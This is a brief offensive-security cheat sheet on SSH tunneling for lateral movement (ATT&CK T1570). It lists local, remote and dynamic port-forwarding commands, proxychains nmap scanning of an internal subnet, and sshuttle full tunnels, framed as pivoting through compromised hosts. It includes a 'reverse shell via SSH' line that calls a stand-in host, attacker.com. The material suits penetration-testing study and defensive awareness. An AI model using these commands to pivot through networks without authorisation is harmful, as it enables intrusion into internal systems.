Lateral Movement | T1570
🔑 SSH Tunneling & Port Forwarding
🧠 Description
SSH tunneling creates encrypted tunnels for forwarding network traffic, enabling pivoting through compromised hosts and accessing internal services through encrypted channels.
🔀 Local Port Forwarding
# Forward local port 8080 to remote service via jump host ssh -L 8080:internal-host:80 user@jump-server.com # Forward local port 3389 to internal RDP ssh -L 3389:internal-pc:3389 user@jump-server.com # Multiple forwards ssh -L 8080:webserver:80 -L 443:webserver:443 -L 3389:rdp-host:3389 user@jump.com # With key ssh -L 8080:target:80 -i key.pem user@jump.com
🔄 Remote Port Forwarding
# Forward remote port 9090 to local service ssh -R 9090:localhost:8080 user@vps-server.com # Bind to all interfaces ssh -R 0.0.0.0:9090:localhost:8080 user@vps.com # Reverse shell via SSH ssh -R 4444:127.0.0.1:4444 user@attacker.com # Proxy pivoting ssh -R 1080:127.0.0.1:1080 user@proxy-server.com
🌐 Dynamic SOCKS Proxy
# Create SOCKS5 proxy on port 1080 ssh -D 1080 user@jump-server.com # Configure browser to use 127.0.0.1:1080 as SOCKS proxy # All traffic through SSH tunnel # With proxychains # Add to /etc/proxychains4.conf # socks5 127.0.0.1 1080 # Use with tools proxychains nmap -sT 10.10.10.0/24 proxychains firefox
🛠️ SSHuttle (Full Tunnel)
# Route all traffic through SSH sshuttle -r user@jump-server.com 10.0.0.0/8 # Exclude specific subnet sshuttle -r user@jump.com 10.0.0.0/8 -x 10.10.10.50 # DNS forwarding sshuttle -r user@jump.com 0/0 --dns # As daemon sshuttle -r user@jump.com 10.0.0.0/8 -D